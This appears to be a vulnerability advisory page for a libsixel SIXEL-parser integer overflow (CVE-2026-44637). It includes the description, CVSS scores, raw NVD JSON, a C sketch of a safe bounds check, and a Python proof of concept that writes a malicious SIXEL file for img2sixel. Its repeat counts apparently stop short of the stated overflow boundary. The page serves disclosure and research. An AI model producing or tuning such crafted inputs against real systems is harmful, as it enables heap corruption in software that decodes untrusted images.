Security Vulnerability Report
CVE-2026-44637 CVSS 7.1 HIGH

CVE-2026-44637

Published: 2026-05-14 20:17:09
Last Modified: 2026-05-14 21:21:11

Description

libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. From to 1.8.7-r1, a signed integer overflow in the SIXEL parser's image-buffer doubling loop can lead to an out-of-bounds heap write in sixel_decode_raw_impl. context->pos_x grows by repeat_count on every sixel character with no upper bound check. Once pos_x approaches INT_MAX, the expression "pos_x + repeat_count" used to size the image buffer overflows signed int. Depending on how the overflow wraps, the resize check that should reject oversized buffers can be bypassed, after which a subsequent write computes a large attacker-influenced offset into image->data and writes past the allocation. Reachable from any caller that decodes attacker-supplied SIXEL data, including img2sixel. This vulnerability is fixed in 1.8.7-r2.
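The failure mode described above, as an added example: a simplified C model of a width check that adds pos_x and repeat_count in signed 32-bit arithmetic, next to an overflow-safe form. This is not libsixel's code; the function names, MAX_WIDTH and the sample values are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

#define MAX_WIDTH 1000000  /* assumed decoder limit, not a libsixel constant */

/* Two's-complement wrap of a + b, computed without undefined behaviour.
 * Models what "pos_x + repeat_count" typically yields after int overflow. */
static int32_t wrapped_sum32(int32_t a, int32_t b)
{
    uint32_t u = (uint32_t)a + (uint32_t)b;
    return (u <= INT32_MAX) ? (int32_t)u : -(int32_t)(UINT32_MAX - u) - 1;
}

/* Naive pattern: returns 1 if the run is seen as exceeding the buffer. */
static int naive_needs_resize(int32_t width, int32_t pos_x, int32_t repeat_count)
{
    return wrapped_sum32(pos_x, repeat_count) > width;
}

/* Hardened pattern: 0 and *new_width on success, -1 if the run is rejected. */
static int checked_grow(int32_t width, int32_t pos_x, int32_t repeat_count,
                        int32_t *new_width)
{
    if (width <= 0 || pos_x < 0 || repeat_count < 0)
        return -1;
    if (pos_x > MAX_WIDTH || repeat_count > MAX_WIDTH - pos_x)
        return -1;                     /* compare by subtraction: cannot overflow */
    int32_t needed = pos_x + repeat_count;  /* now provably <= MAX_WIDTH */
    while (width < needed)             /* doubling step, clamped at the limit */
        width = (width > MAX_WIDTH / 2) ? MAX_WIDTH : width * 2;
    *new_width = width;
    return 0;
}

int main(void)
{
    int32_t w = 0;
    printf("naive check near INT_MAX: %d\n",
           naive_needs_resize(2048, INT32_MAX - 5, 10));
    printf("checked near INT_MAX:     %d\n",
           checked_grow(2048, INT32_MAX - 5, 10, &w));
    printf("checked normal run:       %d (width %d)\n",
           checked_grow(2048, 3000, 500, &w), (int)w);
    return 0;
}
```

In the naive form the wrapped sum is negative, so the check reports that the run fits and no resize or rejection happens; the checked form rejects the same input before any addition is performed.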

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

libsixel <= 1.8.7-r1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

# Conceptual PoC for CVE-2026-44637
# Generates a malicious SIXEL string to trigger integer overflow


def generate_malicious_sixel():
    # SIXEL escape sequence header
    payload = b"\x1BPq"

    # Character to repeat (SIXEL pixel)
    repeat_char = b'?'

    # A large repeat count to push pos_x towards INT_MAX
    # In a real exploit, this would be tuned to hit the exact overflow boundary
    large_count = 10000
    segment = b"!" + str(large_count).encode() + repeat_char

    # Repeat the segment many times to simulate unbounded growth
    # The parser loops over these, adding repeat_count to pos_x each time
    payload += segment * 100000

    # SIXEL terminator
    payload += b"\x1B\\"
    return payload


if __name__ == "__main__":
    filename = "exploit_sixel.bin"
    with open(filename, "wb") as f:
        f.write(generate_malicious_sixel())
    print(f"[+] Generated malicious file: {filename}")
    print(f"[+] Usage: img2sixel {filename}")
```

References

https://github.com/saitoha/libsixel/security/advisories/GHSA-9jm7-77gr-qghv

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44637", "sourceIdentifier": "[email protected]", "published": "2026-05-14T20:17:08.847", "lastModified": "2026-05-14T21:21:10.620", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. From to 1.8.7-r1, a signed integer overflow in the SIXEL parser's image-buffer doubling loop can lead to an out-of-bounds heap write in sixel_decode_raw_impl. context->pos_x grows by repeat_count on every sixel character with no upper bound check. Once pos_x approaches INT_MAX, the expression \"pos_x + repeat_count\" used to size the image buffer overflows signed int. Depending on how the overflow wraps, the resize check that should reject oversized buffers can be bypassed, after which a subsequent write computes a large attacker-influenced offset into image->data and writes past the allocation. Reachable from any caller that decodes attacker-supplied SIXEL data, including img2sixel. This vulnerability is fixed in 1.8.7-r2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/saitoha/libsixel/security/advisories/GHSA-9jm7-77gr-qghv", "source": "[email protected]"}]}}